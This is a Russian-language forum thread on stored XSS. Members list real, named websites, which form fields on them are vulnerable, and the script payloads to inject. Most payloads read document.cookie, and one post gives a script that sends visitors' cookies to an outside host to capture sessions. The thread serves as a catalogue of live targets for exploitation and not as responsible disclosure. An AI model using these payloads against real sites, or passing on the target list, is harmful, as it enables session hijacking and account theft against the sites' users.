Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. olegator

    olegator Member

    Joined:
    10 Feb 2009
    Messages:
    17
    Likes Received:
    38
    Reputations:
    0
    HTML:
    http://www.tourjournals.ru/user/register
    Уязвимые поля:

    1 .Настоящее имя и фамилия (по желанию)

    2 .Немного о себе

    3. Откуда Вы?

    4. Домашняя страничка
     
    2 people like this.
  2. brain[pillow]

    brain[pillow] Active Member

    Joined:
    7 Nov 2008
    Messages:
    7
    Likes Received:
    103
    Reputations:
    74
    Уважаемые модераторы сего раздела, вы зае*али удалять мои сообщения.

    Активная XSS в теле письма на mail.ru: http://brainpillow.cc/bugtraq/mail.ru_active_xss_15.04.2010.txt
    Активная XSS в теле письма на mail.com: http://brainpillow.cc/bugtraq/mail.com_active_xss_15.04.2010.txt
    Активная XSS в теле письма на ukr.net: http://brainpillow.cc/bugtraq/ukr.net_active_xss_15.04.2010.txt
    Активная XSS в теле письма на qip.ru: http://brainpillow.cc/bugtraq/qip.ru_active_xss_16.04.2010.txt
     
    #362 brain[pillow], 19 Apr 2010
    Last edited: 19 Apr 2010
    1 person likes this.
  3. life_glider

    life_glider Member

    Joined:
    13 Apr 2010
    Messages:
    42
    Likes Received:
    25
    Reputations:
    33
    e1.ru

    Посещаемость до 280к/день
    ТИЦ:3100
    http://www.e1.ru/auto/sale/485057.html
    http://www.e1.ru/auto/truck/27138.html

    Размещаем обявление:
    в первом случае уязвимо поле VIN
    во втором уязвимо поле ПРОДАВЕЦ
     
    2 people like this.
  4. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://www.medicalstudents.in/
    регаемся, Оставляем мессагу javascript:alert();
     
    1 person likes this.
  5. kurzza

    kurzza Member

    Joined:
    7 Dec 2009
    Messages:
    24
    Likes Received:
    16
    Reputations:
    5
    http://smspartner.biz/
    http://partners.smsbz.ru/
    http://partners.lika-x.ru/
    уязвимое поле ник. редачить можно в профиле.
    <script>alert()</script>
     
    #365 kurzza, 28 Apr 2010
    Last edited: 28 Apr 2010
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.mail.az/

    уязвимы все поля регистрации

    Имя

    Фамилия

    Страна

    Город

    логин....


    "><script>alert(document.cookie)</script>

    "><script>alert('xss')</script>
    -------------------------------------------------------
    http://www.freenet.am

    уязвимы все поля регистрации

    Full name

    Country, City

    E-mail

    Secret Question

    "><script>alert(document.cookie)</script>
     
    _________________________
    #366 Konqi, 28 Apr 2010
    Last edited: 28 Apr 2010
    1 person likes this.
  7. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    402
    Likes Received:
    118
    Reputations:
    23
    klgd.ru
    при регистрации уязвимые поля: Имя и Логин
    http://www.klgd.ru/reception/forum/index.php?PAGE_NAME=profile_view&UID=14134
     
  8. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    Активка в теле
    http://www.liveinternet.ru/im/inbox

    PHP:
    "'></title><script>alert(document.cookie)</script>
    Отправляем ответ на любое входящее сообщение и получаем активку в теле сообщения.
     
    _________________________
    #368 Uex Urgent, 14 May 2010
    Last edited: 14 May 2010
    3 people like this.
  9. brain[pillow]

    brain[pillow] Active Member

    Joined:
    7 Nov 2008
    Messages:
    7
    Likes Received:
    103
    Reputations:
    74
    3 people like this.
  10. life_glider

    life_glider Member

    Joined:
    13 Apr 2010
    Messages:
    42
    Likes Received:
    25
    Reputations:
    33
    liveinterne

    Отправляем Личные сообщения:
    http://www.liveinternet.ru/im/letter/create

    в теле сообщения:
    PHP:
    <script>alert("found by life_glider");</script>
     
    #370 life_glider, 23 May 2010
    Last edited: 23 May 2010
    1 person likes this.
  11. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    ТИЦ:500
    PR:7
    AlexaRank:1307

    https://dl.dropbox.com/u/7832268/sample.html
     
    1 person likes this.
  12. gars0n

    gars0n Elder - Старейшина

    Joined:
    9 Dec 2009
    Messages:
    483
    Likes Received:
    104
    Reputations:
    65
    holm.ru
    В поле логин
    Code:
    "><script>alert('hugo')</script>
     
  13. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    http://karpaty-slavsko.com.ua/guestbook.php
    Поле Вопрос.
    "><ScRiPt>alert('x')</ScRiPt>
     
  14. mst

    mst New Member

    Joined:
    27 Jun 2010
    Messages:
    3
    Likes Received:
    3
    Reputations:
    0
    украинская соц.сеть connect.ua
    активная xss в описании фотографии
    exploi

    </title><script>alert()</script>
     
    3 people like this.
  15. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    Какой то хостинг сайтов.
    уязвимые поля в профиле: Имя и Фамилия.

    пример.
    http://www.che.ru/users/index.php?flt_personal_birthday_day=07-05
     
    _________________________
    5 people like this.
  16. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    http://www.unsigned.com/
    уязвимо поле названия аккаунта
     
    #376 zlo12, 28 Jul 2010
    Last edited: 28 Jul 2010
    1 person likes this.
  17. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.mysql.ru/search/?b=1&terms=<script>alert(123)</script>
    
    не активная правда, но мне просто нравится где)
     
    #377 Seravin, 1 Aug 2010
    Last edited: 7 Aug 2010
    2 people like this.
  18. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    При создании объявления в поле "текст объявления":
    Code:
    <script>
    img = new Image(); img.src = "http://site.ru/sniff.gif?"+document.cookie;
    </script>
     
  19. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    CMS Legal
    Code:
    http://www.cmslegal.ru/ourpeople/pages/default.aspx
    First Name иле Last Name:
    PHP:
    "><script>alert(document.cookie)</script><"
     
    2 people like this.
  20. bast3n

    bast3n Member

    Joined:
    5 Jul 2010
    Messages:
    11
    Likes Received:
    11
    Reputations:
    6
    Code:
    http://www.quotationspage.com/search.php3?Search=&startsearch=Search
    в Quotation или Author:
    PHP:
    "><script>alert(document.cookie)</script><"
    Code:
    http://mail.mostweb.cc/JumpTo.php?LinkID=23"<script>alert(document.cookie)</script>
    Code:
    http://classicauthors.net/JumpTo.php?LinkID=30"<script>alert(document.cookie)</script>